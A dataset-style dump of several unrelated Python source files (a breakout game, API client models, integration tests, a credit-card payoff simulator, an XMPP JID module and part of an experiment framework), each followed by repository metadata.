self.rect.y = paddle.rect.top()
self.vy *= -1
pos = self.rect.center().x - paddle.rect.center().x
self.vx = pos/10
play_effect('Jump_3')
def collide_with_block(self, block):
if self.rect.intersects(block.rect):
if self.rect.intersects(block.left):
self.rect.x = block.rect.left()-self.rect.w
self.vx = -abs(self.vx)
elif self.rect.intersects(block.right):
self.rect.x = block.rect.right()
self.vx = abs(self.vx)
elif self.rect.intersects(block.top):
self.rect.y = block.rect.top()
self.vy = abs(self.vy)
elif self.rect.intersects(block.bottom):
self.rect.y = block.rect.bottom()-self.rect.h
self.vy = -abs(self.vy)
return True
def update(self, dt):
self.rect.x += self.vx + dt*10
self.rect.y += self.vy + dt*10
if self.rect.right() >= screen_size.w:
self.rect.x = screen_size.w - self.rect.w
self.vx *= -1
play_effect('Jump_5')
if self.rect.left() <= 0:
self.rect.x = 0
self.vx *= -1
play_effect('Jump_5')
if self.rect.top() >= screen_size.h:
self.rect.y = screen_size.h - self.rect.w
self.vy *= -1
play_effect('Jump_5')
def draw(self):
fill(1,1,0)
no_stroke()
ellipse(*self.rect)
class Block(object):
def __init__(self, x, y, w, mode=1):
self.size = Size(w, 30)
self.rect = Rect(x, y, *self.size)
self.mode = mode
if self.mode > 1:
self.colour = (0.70, 0.70, 0.70)
else:
self.colour = (1,0,0)
top = self.rect.top()
left = self.rect.left()
right = self.rect.right()
bottom = self.rect.bottom()
self.left = Rect(left-5, bottom+5, 5, top-bottom-10)
self.right = Rect(right, bottom+5, 5, top-bottom-10)
self.bottom = Rect(left, bottom, right-left, 5)
self.top = Rect(left, top-5, right-left, 5)
def draw_sides(self):
fill(0,1,0)
rect(*self.left)
rect(*self.right)
rect(*self.top)
rect(*self.bottom)
def draw(self):
stroke_weight(1)
#no_stroke()
fill(*self.colour)
rect(*self.rect)
#self.draw_sides()
def random_level(n=7, t=13):
level = []
for i in range(n):
level.append([])
for j in range(t):
level[i].append(randint(0, 1))
return level
level = [
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],
[[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 0, 0, 2, 2, 2]],
random_level()
]
class Game(Scene):
def setup(self):
self.level = 1
self.field = Field()
self.player = Player()
self.ball = Ball()
self.blocks = []
self.spawn_blocks()
def spawn_blocks(self):
self.solid_blocks = []
if self.level > len(level):
lvl = len(level)-1
else:
lvl = self.level-1
for y in range(len(level[lvl])):
for x in range(len(level[lvl][y])):
w = screen_size.w/len(level[lvl][y])
mode = level[lvl][y][x]
if level[lvl][y][x] == 1:
self.blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
elif level[lvl][y][x] == 2:
self.solid_blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
def draw(self):
removed_blocks = set()
text('Lives: {0}'.format(self.player.lives), x=screen_size.w-45, y=screen_size.h-40)
text('Level: {0}'.format(self.level), x=45, y=screen_size.h-45)
self.field.draw()
self.player.draw()
self.player.update()
self.ball.draw()
if self.ball.is_moving:
self.ball.update(self.dt)
self.ball.collide_with_paddle(self.player)
else:
self.ball.rect.center(self.player.rect.center().x, self.player.rect.top()+10)
self.ball.line = (0, 0, 0, 0)
if self.ball.rect.top() < 0:
self.player.lives -= 1
self.ball.is_moving = False
for block in self.blocks:
block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(block):
removed_blocks.add(block)
play_effect('Hit_3')
for solid_block in self.solid_blocks:
solid_block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(solid_block):
play_effect('Ding_1')
for removed_block in removed_blocks:
self.blocks.remove(removed_block)
if len(self.blocks) == 0:
self.ball.is_moving = False
self.level += 1
self.spawn_blocks()
if self.level >= len(level):
level[-1] = random_level()
self.spawn_blocks()
if self.player.lives == 0:
main_scene.switch_scene(GameOver())
def touch_began(self, touch):
if not self.ball.is_moving:
self.ball.is_moving = True
class GameOver(Scene):
def setup(self):
self.field = Field()
self.button = Button(Rect(screen_size.w/2-100, screen_size.h/2-50, 200, 100), 'Restart')
self.button.action = self.restart
self.add_layer(self.button)
def restart(self):
main_scene.switch_scene(Game())
def draw(self):
self.field.draw()
self.button.draw()
no_tint()
text('Game Over', x=screen_size.w/2, y=screen_size.h/4*3, font_size=64)
class MultiScene(Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
run(self, PORTRAIT)
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.active_scene.add_layer = self.add_layer
self.active_scene.size = self.size
self.active_scene.bounds = self.bounds
self.active_scene.setup()
def draw(self):
background(0.00, 0.25, 0.50)
self.active_scene.touches = self.touches
self.active_scene.dt = self.dt
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(Game()) | [
"[email protected]"
] | |
acafcee721e06c4272142c36a3deca0a91574319 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_2/models/object_store_access_policy_rule.py | c48033b9db845a618c81bd67851d063292b423c6 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 5,091 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.2, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_2 import models
class ObjectStoreAccessPolicyRule(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'actions': 'list[str]',
'conditions': 'PolicyRuleObjectAccessCondition',
'effect': 'str',
'policy': 'FixedReference',
'resources': 'list[str]'
}
attribute_map = {
'name': 'name',
'actions': 'actions',
'conditions': 'conditions',
'effect': 'effect',
'policy': 'policy',
'resources': 'resources'
}
required_args = {
}
def __init__(
self,
name=None, # type: str
actions=None, # type: List[str]
conditions=None, # type: models.PolicyRuleObjectAccessCondition
effect=None, # type: str
policy=None, # type: models.FixedReference
resources=None, # type: List[str]
):
"""
Keyword args:
name (str): Name of the object (e.g., a file system or snapshot).
actions (list[str]): The list of actions granted by this rule. Each included action may restrict other properties of the rule. Supported actions are returned by the `/object-store-access-policy-actions` endpoint.
conditions (PolicyRuleObjectAccessCondition): Conditions used to limit the scope which this rule applies to.
effect (str): Effect of this rule. When `allow`, the rule allows the given actions to be performed on the given resources, subject to the given conditions. Valid values include `allow`.
policy (FixedReference): The policy to which this rule belongs.
resources (list[str]): The list of resources which this rule applies to. Each resource can include a bucket component, optionally followed by an object component. The choice of which components a resource can include is dictated by which actions are included in the rule. For further details, see the Object Store Access Policy Actions section of the User Guide.
"""
if name is not None:
self.name = name
if actions is not None:
self.actions = actions
if conditions is not None:
self.conditions = conditions
if effect is not None:
self.effect = effect
if policy is not None:
self.policy = policy
if resources is not None:
self.resources = resources
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ObjectStoreAccessPolicyRule`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ObjectStoreAccessPolicyRule, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ObjectStoreAccessPolicyRule):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
95ed3ebf9418039cb36fd809dcb13026d8ffb163 | 4ca6c75b8cfe7604827827aeee83b104fa7c93d9 | /tests/apigateway/tests.py | a4c13a38821d83909c9775a29a08392a8dee52c7 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | ZextrasGiacomoMattiuzzi/gordon | 3767800c64caf4444a13c15e890f84505b62296d | b6e4e8d5998c2b2c4c4edb3a2ec7124290f46e8b | refs/heads/master | 2022-12-22T02:21:09.422648 | 2020-09-16T15:03:06 | 2020-09-16T15:03:06 | 285,250,476 | 0 | 1 | NOASSERTION | 2020-08-05T10:05:08 | 2020-08-05T10:05:08 | null | UTF-8 | Python | false | false | 3,393 | py | import os
import json
import boto3
import requests
from gordon.utils_tests import BaseIntegrationTest, BaseBuildTest
from gordon.utils import valid_cloudformation_name
from gordon import utils
class IntegrationTest(BaseIntegrationTest):
def test_0001_project(self):
self._test_project_step('0001_project')
self.assert_stack_succeed('p')
self.assert_stack_succeed('r')
lambda_ = self.get_lambda(utils.valid_cloudformation_name('pyexample:hellopy'))
self.assertEqual(lambda_['Runtime'], 'python2.7')
self.assertEqual(lambda_['Description'], 'My hello description')
self.assertEqual(lambda_['MemorySize'], 192)
self.assertEqual(lambda_['Timeout'], 123)
aliases = self.get_lambda_aliases(function_name=lambda_['FunctionName'])
self.assertEqual(list(aliases.keys()), ['current'])
response = self.invoke_lambda(
function_name=lambda_['FunctionName'],
payload={}
)
self.assert_lambda_response(response, 'hello')
lambda_ = self.get_lambda(utils.valid_cloudformation_name('pyexample:byepy'))
self.assertEqual(lambda_['Runtime'], 'python2.7')
self.assertEqual(lambda_['Description'], 'My bye description')
self.assertEqual(lambda_['MemorySize'], 192)
self.assertEqual(lambda_['Timeout'], 123)
aliases = self.get_lambda_aliases(function_name=lambda_['FunctionName'])
self.assertEqual(list(aliases.keys()), ['current'])
response = self.invoke_lambda(
function_name=lambda_['FunctionName'],
payload={}
)
self.assert_lambda_response(response, 'bye')
client = boto3.client('apigateway')
api = [a for a in client.get_rest_apis()['items'] if a['name'] == 'helloapi-{}'.format(self.uid)][0]
endpoint = 'https://{}.execute-api.{}.amazonaws.com/{}'.format(api['id'], os.environ['AWS_DEFAULT_REGION'], self.uid)
response = requests.get(endpoint)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/404'.format(endpoint))
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/shop/2'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.get('{}/http'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf-8'))['args'], {'hello': 'world'})
response = requests.get('{}/complex'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"hello"')
response = requests.post('{}/complex'.format(endpoint))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.decode('utf-8'), '"bye"')
class BuildTest(BaseBuildTest):
def test_0001_project(self):
self.maxDiff = None
self._test_project_step('0001_project')
self.assertBuild('0001_project', '0001_p.json')
self.assertBuild('0001_project', '0002_pr_r.json')
self.assertBuild('0001_project', '0003_r.json')
| [
"[email protected]"
] | |
2dfd45cbd4308213e05b748eeca0e94c887cb457 | b50f43c7c8cba1c0f349870596f12d1a333e6f42 | /axonius_api_client/api/json_api/lifecycle.py | 1b1fa1e637e4ac6cc877cd9a193ee9d9678de93e | [
"MIT"
] | permissive | zahediss/axonius_api_client | 190ca466e5de52a98af9b527a5d1c132fd8a5020 | 8321788df279ffb7794f179a4bd8943fe1ac44c4 | refs/heads/master | 2023-08-01T14:35:17.095559 | 2021-09-13T21:04:23 | 2021-09-13T21:04:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,301 | py | # -*- coding: utf-8 -*-
"""Models for API requests & responses."""
import dataclasses
from typing import List, Optional, Type
import marshmallow_jsonapi
from .base import BaseModel, BaseSchema, BaseSchemaJson
class LifecycleSchema(BaseSchemaJson):
"""Pass."""
last_finished_time = marshmallow_jsonapi.fields.Str(allow_none=True)
last_start_time = marshmallow_jsonapi.fields.Str(allow_none=True)
next_run_time = marshmallow_jsonapi.fields.Number(allow_none=True)
status = marshmallow_jsonapi.fields.Str()
sub_phases = marshmallow_jsonapi.fields.List(marshmallow_jsonapi.fields.Dict())
tunnel_status = marshmallow_jsonapi.fields.Str()
class Meta:
"""Pass."""
type_ = "lifecycle_schema"
@staticmethod
def get_model_cls() -> type:
"""Pass."""
return Lifecycle
@dataclasses.dataclass
class Lifecycle(BaseModel):
"""Pass."""
last_finished_time: Optional[str] = None
last_start_time: Optional[str] = None
next_run_time: Optional[str] = None
status: Optional[str] = None
sub_phases: List[dict] = dataclasses.field(default_factory=list)
tunnel_status: Optional[str] = None
@staticmethod
def get_schema_cls() -> Optional[Type[BaseSchema]]:
"""Pass."""
return LifecycleSchema
| [
"[email protected]"
] | |
26d6ddad8285870df5057d6ccabf8e80206457e9 | 95495baeb47fd40b9a7ecb372b79d3847aa7a139 | /test/test_network_address.py | d733d83fb937e590c374c7132fc314a75cc127e8 | [] | no_license | pt1988/fmc-api | b1d8ff110e12c13aa94d737f3fae9174578b019c | 075f229585fcf9bd9486600200ff9efea5371912 | refs/heads/main | 2023-01-07T09:22:07.685524 | 2020-10-30T03:21:24 | 2020-10-30T03:21:24 | 308,226,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,192 | py | # coding: utf-8
"""
Cisco Firepower Management Center Open API Specification
**Specifies the REST URLs and methods supported in the Cisco Firepower Management Center API. Refer to the version specific [REST API Quick Start Guide](https://www.cisco.com/c/en/us/support/security/defense-center/products-programming-reference-guides-list.html) for additional information.** # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.network_address import NetworkAddress # noqa: E501
from swagger_client.rest import ApiException
class TestNetworkAddress(unittest.TestCase):
"""NetworkAddress unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNetworkAddress(self):
"""Test NetworkAddress"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.network_address.NetworkAddress() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
62d0e0bb9ae6823f07924b56f20e211d04c91598 | 71dc727f9056934cd51692f8a3d26cf0dda44ef0 | /sample-programs/week6/credit_card.py | c01ecf9751b6232aa66da9be53bfaadfc1851845 | [
"MIT"
] | permissive | justinclark-dev/CSC110 | 9d255020a50bbfdb195465c3e742dd2fcd61e3a4 | d738ec33b757ba8fa9cf35b2214c184d532367a0 | refs/heads/master | 2022-12-08T08:08:30.667241 | 2020-09-04T01:05:34 | 2020-09-04T01:05:34 | 232,606,910 | 0 | 1 | MIT | 2020-09-04T02:05:47 | 2020-01-08T16:28:37 | Python | UTF-8 | Python | false | false | 2,153 | py | # credit_card.py
#
# How long will it take to pay off a credit card balance??
# This program makes use of a loop to perform a SIMULATION
# of a real-world situation.
# CSC 110
# Fall 2011
### Get and validate inputs
interest_multiplier = float(input('Enter an ANNUAL INTEREST RATE ' \
+ 'as a PERCENTAGE, >= zero: ')) / 1200.0
while interest_multiplier < 0:
interest_multiplier = float(input('TRY AGAIN -- annual ' \
+ 'rate must be >= zero: ')) / 1200.0
initial_balance = float(input('Enter an INITIAL ACCOUNT BALANCE ' \
+ 'in dollars, >= 100: '))
while initial_balance < 100:
initial_balance = float(input('TRY AGAIN -- initial balance ' \
+ 'must be >= 100: '))
payment = float(input('Enter the MONTHLY PAYMENT to be made, ' \
+ 'in dollars, >= 10: '))
while payment < 10:
payment = float(input('TRY AGAIN -- monthly payment ' \
+ 'must be >= 10: '))
### Simulate account changes until the account is paid in full
balance = initial_balance # initialize accumulator
months = 0 # initialize counter
total_payments = 0 # initialize accumulator;
# NOTICE that the loop continues as long as the balance is greater than
# zero, BUT not longer than 1200 months -- a condition necessary
# to prevent an infinite loop if the payment is too low.
while balance > 0 and months < 1200:
balance = balance + (balance * interest_multiplier)
balance -= payment
total_payments += payment
months += 1
# print(balance) # use to TRACE loop operation
years = months // 12 # integer division on purpose -- whole years only
months = months % 12
### Show results
print('\nAfter ' + str(years) + ' years and ' + str(months) + ' months')
if balance <= 0:
print('your debt is paid.')
total_payments += balance # corrects for any excess payment (balance <= 0)
print('\nTotal interest = $'
+ format((total_payments - initial_balance),',.2f') + '.')
else:
print('your debt is still not paid off!')
print('Remaining balance = $' + format(balance, ',.2f') + '.')
print('\nTotal payments = $' + format(total_payments, ',.2f') + '.\n')
| [
"[email protected]"
] | |
fc8513bcd2fc4bdbe5be8bd006d2a3eb9c1d4e7a | ee408614842a6d4dbb5b82e9c4561cf34eec71c9 | /src/aircraft/__init__.py | e80708e9c427c76ecbd82fe6a61277c47d8a652d | [
"Apache-2.0"
] | permissive | relaxdiego/aircraft | ef0dd47d530f4abb4a4726111cc8f0d93f4b922a | ce9a6724fe33be38777991fbb1cd731e197fa468 | refs/heads/main | 2023-03-08T00:06:52.774568 | 2021-02-02T05:37:06 | 2021-02-02T05:37:06 | 290,408,644 | 10 | 1 | NOASSERTION | 2021-01-14T06:23:11 | 2020-08-26T05:56:16 | HTML | UTF-8 | Python | false | false | 74 | py | from pathlib import Path
aircraft_dir = (Path(__file__) / '..').resolve()
| [
"[email protected]"
] | |
52ee52ca04897359b7e695a86c8052f993618c0d | 53784d3746eccb6d8fca540be9087a12f3713d1c | /res/packages/scripts/scripts/client/messenger/proto/xmpp/jid.py | e203d8aed0708dffb0f2472e615a03256d991a33 | [] | no_license | webiumsk/WOT-0.9.17.1-CT | 736666d53cbd0da6745b970e90a8bac6ea80813d | d7c3cf340ae40318933e7205bf9a17c7e53bac52 | refs/heads/master | 2021-01-09T06:00:33.898009 | 2017-02-03T21:40:17 | 2017-02-03T21:40:17 | 80,870,824 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 6,022 | py | # 2017.02.03 21:53:47 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/messenger/proto/xmpp/jid.py
import random
import types
import time
from string import Template
from ConnectionManager import connectionManager
from ids_generators import SequenceIDGenerator
from messenger import g_settings
from messenger.proto.xmpp.xmpp_constants import XMPP_MUC_CHANNEL_TYPE
class BareJID(object):
__slots__ = ('_node', '_domain')
def __init__(self, jid = None):
super(BareJID, self).__init__()
self.setJID(jid)
def setJID(self, jid):
tail = ''
if not jid:
self._node, self._domain = ('', '')
elif type(jid) in types.StringTypes:
if jid.find('@') + 1:
self._node, jid = jid.split('@', 1)
self._node = self._node.lower()
else:
self._node = ''
if jid.find('/') + 1:
self._domain, tail = jid.split('/', 1)
else:
self._domain = jid
self._domain = self._domain.lower()
elif isinstance(jid, BareJID):
self._node, self._domain, tail = jid.getNode(), jid.getDomain(), jid.getResource()
else:
raise ValueError('JID can be specified as string or as instance of JID class.')
return tail
def getBareJID(self):
return self
def getNode(self):
return self._node
def setNode(self, node):
if node is None:
self._node = ''
if type(node) in types.StringTypes:
self._node = node.lower()
else:
self._node = node
return
def getDomain(self):
return self._domain
def setDomain(self, domain):
raise domain or AssertionError('Domain no empty')
self._domain = domain.lower()
def getResource(self):
return ''
def setResource(self, resource):
pass
def __str__(self):
if self._node:
jid = '{0}@{1}'.format(self._node, self._domain)
else:
jid = self._domain
return jid
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__str__() == str(other)
def __ne__(self, other):
return not self.__eq__(other)
def __nonzero__(self):
return self.__str__() != ''
def __hash__(self):
return hash(self.__str__())
def __getstate__(self):
return str(self)
def __setstate__(self, state):
self.setJID(state)
class JID(BareJID):
__slots__ = ('_resource',)
def __init__(self, jid = None):
super(JID, self).__init__(jid)
def setJID(self, jid):
self._resource = super(JID, self).setJID(jid)
def getBareJID(self):
return BareJID(self)
def getResource(self):
return self._resource
def setResource(self, resource):
self._resource = resource or ''
def __str__(self):
jid = super(JID, self).__str__()
if self._resource:
jid = '{0}/{1}'.format(jid, self._resource)
return jid
class _DatabaseIDGetter(object):
def getDatabaseID(self):
value = getattr(self, '_node')
if value:
try:
result = long(value)
except ValueError:
result = 0
else:
result = 0
return result
class ContactBareJID(BareJID, _DatabaseIDGetter):
def __hash__(self):
return self.getDatabaseID()
class ContactJID(JID, _DatabaseIDGetter):
def getBareJID(self):
return ContactBareJID(self)
def __hash__(self):
return self.getDatabaseID()
def makeContactJID(dbID):
jid = ContactBareJID()
jid.setNode(long(dbID))
jid.setDomain(g_settings.server.XMPP.domain)
return jid
_counter = SequenceIDGenerator()
def makeUserRoomJID(room = ''):
jid = JID()
service = g_settings.server.XMPP.getChannelByType(XMPP_MUC_CHANNEL_TYPE.USERS)
if not service or not service['hostname']:
return jid
if not room:
room = 'user_room_{:08X}_{:08X}_{:04X}'.format(long(time.time()) & 4294967295L, random.randrange(1, 4294967295L), _counter.next())
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
def makeSystemRoomJID(room = '', channelType = XMPP_MUC_CHANNEL_TYPE.STANDARD):
"""
create jid for system room
:param room: room name if exist
:param channelType: channel type (XMPP_MUC_CHANNEL_TYPE)
:return: system room jid
"""
jid = JID()
service = g_settings.server.XMPP.getChannelByType(channelType)
if not service or not service['hostname']:
return jid
room = room or _getSystemChannelNameFormatter(service)
if not room:
return jid
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
def _getSystemChannelNameFormatter(service):
peripheryID = connectionManager.peripheryID
chanTemplate = Template(service['format'])
if chanTemplate:
return chanTemplate.safe_substitute(peripheryID=peripheryID, userString=service['userString'], hostname=service['hostname'], type=service['type'])
else:
return None
def makeClanRoomJID(clandDbId, channelType = XMPP_MUC_CHANNEL_TYPE.CLANS):
"""
create jid for clan room
:param room: room name if exist
:return: clan room jid
"""
jid = JID()
service = g_settings.server.XMPP.getChannelByType(channelType)
if not service or not service['hostname']:
return jid
clanTemplate = Template(service['format'])
room = clanTemplate.safe_substitute(clanDBID=clandDbId)
if not room:
return jid
jid.setNode(room)
jid.setDomain(service['hostname'])
return jid
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\messenger\proto\xmpp\jid.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:53:47 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
d7a833d3cfc9b1389683b76c5f0ef9a016938987 | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2017/09/wisc-gerrymandering-20170929/graphic_config.py | cb18764b6b447f7d4bc8090dc4075e9d99f838a3 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1F_HDqo1D2EwXiUx95wG4QPRAvhm3P76OP6aXyv8NYgY'
USE_ASSETS = True
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| [
"[email protected]"
] | |
48afa2ed7bfc32040267b178f1deefe509eece2c | 776125e755de00eecd90b9813022ae8491a75711 | /artemis/experiments/experiments.py | bf0aa78fb62b8b59d5e1bcba51955aa1c79562b7 | [
"BSD-2-Clause-Views"
] | permissive | nalyat/artemis | 04c6d4b77e143f8f439dd4aefb519d9a1c5011e0 | ad2871fae7d986bf10580eec27aee5b7315adad5 | refs/heads/master | 2022-04-10T04:45:28.753251 | 2019-04-17T03:18:57 | 2019-04-17T03:18:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,710 | py | import atexit
import inspect
from collections import OrderedDict
from contextlib import contextmanager
from functools import partial
from six import string_types
from artemis.experiments.experiment_record import ExpStatusOptions, experiment_id_to_record_ids, load_experiment_record, \
get_all_record_ids, clear_experiment_records
from artemis.experiments.experiment_record import run_and_record
from artemis.experiments.experiment_record_view import compare_experiment_records, show_record
from artemis.experiments.hyperparameter_search import parameter_search
from artemis.general.display import sensible_str
from artemis.general.functional import get_partial_root, partial_reparametrization, \
advanced_getargspec, PartialReparametrization
from artemis.general.should_be_builtins import izip_equal
from artemis.general.test_mode import is_test_mode
class Experiment(object):
"""
An experiment. In general you should not use this class directly. Use the experiment_function decorator, and
create variants using decorated_function.add_variant()
"""
def __init__(self, function=None, show=None, compare=None, one_liner_function=None, result_parser = None,
name=None, is_root=False):
"""
:param function: The function defining the experiment
:param display_function: A function that can be called to display the results returned by function.
This can be useful if you just want to re-run the display for already-computed and saved results.
To do this, go experiment.save_last()
:param conclusion: <Deprecated> will be removed in future
:param name: Nmae of this experiment.
"""
self.name = name
self.function = function
self._show = show_record if show is None else show
self._one_liner_results = sensible_str if one_liner_function is None else one_liner_function
self._result_parser = (lambda result: [('Result', self.one_liner_function(result))]) if result_parser is None else result_parser
self._compare = compare_experiment_records if compare is None else compare
self.variants = OrderedDict()
self._notes = []
self.is_root = is_root
self._tags= set()
if not is_root:
all_args, varargs_name, kargs_name, defaults = advanced_getargspec(function)
undefined_args = [a for a in all_args if a not in defaults]
assert len(undefined_args)==0, "{} is not a root-experiment, but arguments {} are undefined. Either provide a value for these arguments or define this as a root_experiment (see {})."\
.format(self, undefined_args, 'X.add_root_variant(...)' if isinstance(function, partial) else 'X.add_config_root_variant(...)' if isinstance(function, PartialReparametrization) else '@experiment_root')
_register_experiment(self)
@property
def show(self):
return self._show
@property
def one_liner_function(self):
return self._one_liner_results
@property
def compare(self):
return self._compare
@compare.setter
def compare(self, val):
self._compare = val
@property
def result_parser(self):
return self._result_parser
def __call__(self, *args, **kwargs):
""" Run the function as normal, without recording or anything. You can also modify with arguments. """
return self.function(*args, **kwargs)
def __str__(self):
return 'Experiment {}'.format(self.name)
def get_args(self):
"""
:return OrderedDict[str, Any]: An OrderedDict of arguments to the experiment
"""
all_arg_names, _, _, defaults = advanced_getargspec(self.function)
return OrderedDict((name, defaults[name]) for name in all_arg_names)
def get_root_function(self):
return get_partial_root(self.function)
def is_generator(self):
return inspect.isgeneratorfunction(self.get_root_function())
def call(self, *args, **kwargs):
"""
Call the experiment function without running as an experiment. If the experiment is a function, this is the same
as just result = my_exp_func(). If it's defined as a generator, it loops and returns the last result.
:return: The last result
"""
if self.is_generator():
result = None
for x in self(*args, **kwargs):
result = x
else:
result = self(*args, **kwargs)
return result
def run(self, print_to_console=True, show_figs=None, test_mode=None, keep_record=None, raise_exceptions=True,
display_results=False, notes = (), **experiment_record_kwargs):
"""
Run the experiment, and return the ExperimentRecord that is generated.
:param print_to_console: Print to console (as well as logging to file)
:param show_figs: Show figures (as well as saving to file)
:param test_mode: Run in "test_mode". This sets the global "test_mode" flag when running the experiment. This
flag can be used to, for example, shorten a training session to verify that the code runs. Can be:
True: Run in test mode
False: Don't run in test mode:
None: Keep the current state of the global "is_test_mode()" flag.
